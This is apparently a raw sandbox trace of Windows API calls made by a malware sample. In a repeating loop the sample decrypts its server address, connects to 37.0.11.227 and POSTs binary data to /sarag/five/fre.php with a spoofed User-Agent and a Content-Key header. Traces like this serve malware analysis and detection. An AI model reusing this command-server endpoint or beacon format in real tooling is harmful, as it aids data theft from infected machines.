[0199.922] GetProcessHeap () returned 0x690000 [0199.922] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0199.922] GetProcessHeap () returned 0x690000 [0199.922] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0199.922] GetProcessHeap () returned 0x690000 [0199.922] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0199.922] GetProcessHeap () returned 0x690000 [0199.923] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0199.923] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1294) returned 0x434 [0199.925] Sleep (dwMilliseconds=0xea60) [0199.927] GetProcessHeap () returned 0x690000 [0199.927] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0199.928] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.928] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0199.934] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.935] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0199.942] GetProcessHeap () returned 0x690000 [0199.942] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0199.943] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.943] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0199.944] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.945] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0199.945] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.946] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0199.946] GetProcessHeap () returned 0x690000 [0199.946] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0199.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.947] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0199.948] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.948] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0199.949] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.949] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0199.949] GetProcessHeap () returned 0x690000 [0199.950] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0199.950] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.951] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0199.951] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.952] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0199.952] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.953] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0199.959] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0199.979] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0199.979] GetProcessHeap () returned 0x690000 [0199.979] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0199.980] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0199.980] GetProcessHeap () returned 0x690000 [0199.980] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0199.980] GetProcessHeap () returned 0x690000 [0199.981] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0199.981] GetProcessHeap () returned 0x690000 [0199.981] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0199.981] GetProcessHeap () returned 0x690000 [0199.981] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0199.982] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.982] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0199.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.988] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0199.994] GetProcessHeap () returned 0x690000 [0199.994] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0199.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.995] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0199.995] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.996] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0199.996] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.996] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0199.997] GetProcessHeap () returned 0x690000 [0199.997] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0199.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.998] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0199.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0199.999] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0200.000] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.000] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0200.000] GetProcessHeap () returned 0x690000 [0200.000] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0200.001] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.001] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0200.001] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.002] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0200.002] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.003] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0200.003] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.004] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0200.004] GetProcessHeap () returned 0x690000 [0200.004] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0200.004] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b2ce0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae928*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0200.004] GetProcessHeap () returned 0x690000 [0200.004] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab330 [0200.004] socket (af=2, type=1, protocol=6) returned 0x438 [0200.004] connect (s=0x438, name=0x6ae928*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0200.024] FreeAddrInfoW (pAddrInfo=0x6b2ce0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae928*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0200.024] GetProcessHeap () returned 0x690000 [0200.024] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0200.024] GetProcessHeap () returned 0x690000 [0200.024] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0200.025] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0200.026] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0200.026] GetProcessHeap () returned 0x690000 [0200.026] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0200.026] GetProcessHeap () returned 0x690000 [0200.026] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0200.026] GetProcessHeap () returned 0x690000 [0200.026] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0200.026] GetProcessHeap () returned 0x690000 [0200.026] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0200.027] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0200.028] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0200.028] GetProcessHeap () returned 0x690000 [0200.028] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0200.028] GetProcessHeap () returned 0x690000 [0200.028] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0200.029] send (s=0x438, buf=0x6abd08*, len=242, flags=0) returned 242 [0200.029] send (s=0x438, buf=0x6aba40*, len=159, flags=0) returned 159 [0200.029] GetProcessHeap () returned 0x690000 [0200.029] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0200.029] recv (in: s=0x438, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0200.094] GetProcessHeap () returned 0x690000 [0200.095] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0200.095] GetProcessHeap () returned 0x690000 [0200.096] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0200.096] GetProcessHeap () returned 0x690000 [0200.096] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0200.096] GetProcessHeap () returned 0x690000 [0200.096] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0200.096] closesocket (s=0x438) returned 0 [0200.097] GetProcessHeap () returned 0x690000 [0200.097] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab330 | out: hHeap=0x690000) returned 1 [0200.097] GetProcessHeap () returned 0x690000 [0200.097] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0200.097] GetProcessHeap () returned 0x690000 [0200.097] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0200.097] GetProcessHeap () returned 0x690000 [0200.098] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0200.098] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1298) returned 0x438 [0200.099] Sleep (dwMilliseconds=0xea60) [0200.101] GetProcessHeap () returned 0x690000 [0200.101] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0200.101] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.102] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0200.106] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.107] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0200.112] GetProcessHeap () returned 0x690000 [0200.112] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0200.113] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.113] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0200.114] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.114] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0200.114] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.115] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0200.115] GetProcessHeap () returned 0x690000 [0200.115] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0200.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.117] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0200.117] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.117] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0200.118] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.118] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0200.118] GetProcessHeap () returned 0x690000 [0200.118] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0200.119] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.119] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0200.119] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.120] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0200.120] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.121] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0200.121] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.121] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0200.122] GetProcessHeap () returned 0x690000 [0200.122] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0200.122] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0200.122] GetProcessHeap () returned 0x690000 [0200.122] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0200.122] GetProcessHeap () returned 0x690000 [0200.122] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0200.122] GetProcessHeap () returned 0x690000 [0200.123] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0200.123] GetProcessHeap () returned 0x690000 [0200.123] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0200.123] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.124] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0200.128] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.128] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0200.133] GetProcessHeap () returned 0x690000 [0200.133] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0200.134] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.134] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0200.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.135] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0200.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.136] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0200.136] GetProcessHeap () returned 0x690000 [0200.136] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0200.137] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.137] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0200.138] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.138] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0200.139] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.139] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0200.139] GetProcessHeap () returned 0x690000 [0200.139] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0200.139] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.140] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0200.140] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.141] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0200.141] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.142] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0200.142] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0200.142] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0200.142] GetProcessHeap () returned 0x690000 [0200.142] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0200.142] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9a50*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8c8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0200.143] GetProcessHeap () returned 0x690000 [0200.143] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab440 [0200.143] socket (af=2, type=1, protocol=6) returned 0x43c [0200.143] connect (s=0x43c, name=0x6ae8c8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0200.162] FreeAddrInfoW (pAddrInfo=0x6a9a50*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8c8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0200.162] GetProcessHeap () returned 0x690000 [0200.162] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0200.162] GetProcessHeap () returned 0x690000 [0200.162] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0200.162] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0200.163] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0200.163] GetProcessHeap () returned 0x690000 [0200.163] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0200.163] GetProcessHeap () returned 0x690000 [0200.164] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0200.164] GetProcessHeap () returned 0x690000 [0200.164] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0200.164] GetProcessHeap () returned 0x690000 [0200.164] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0200.165] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0200.165] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0200.165] GetProcessHeap () returned 0x690000 [0200.165] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6a91a8 [0200.165] GetProcessHeap () returned 0x690000 [0200.166] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0200.166] send (s=0x43c, buf=0x6a91a8*, len=242, flags=0) returned 242 [0200.166] send (s=0x43c, buf=0x6aba40*, len=159, flags=0) returned 159 [0200.166] GetProcessHeap () returned 0x690000 [0200.166] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0200.166] recv (in: s=0x43c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0200.234] GetProcessHeap () returned 0x690000 [0200.235] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a91a8 | out: hHeap=0x690000) returned 1 [0200.235] GetProcessHeap () returned 0x690000 [0200.235] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0200.236] GetProcessHeap () returned 0x690000 [0200.236] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0200.237] GetProcessHeap () returned 0x690000 [0200.237] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0200.237] closesocket (s=0x43c) returned 0 [0200.237] GetProcessHeap () returned 0x690000 [0200.238] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab440 | out: hHeap=0x690000) returned 1 [0200.238] GetProcessHeap () returned 0x690000 [0200.238] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0200.238] GetProcessHeap () returned 0x690000 [0200.239] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0200.239] GetProcessHeap () returned 0x690000 [0200.239] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0200.240] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x12a4) returned 0x43c [0200.241] Sleep (dwMilliseconds=0xea60) [0200.242] GetProcessHeap () returned 0x690000 [0200.243] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0200.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0200.244] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 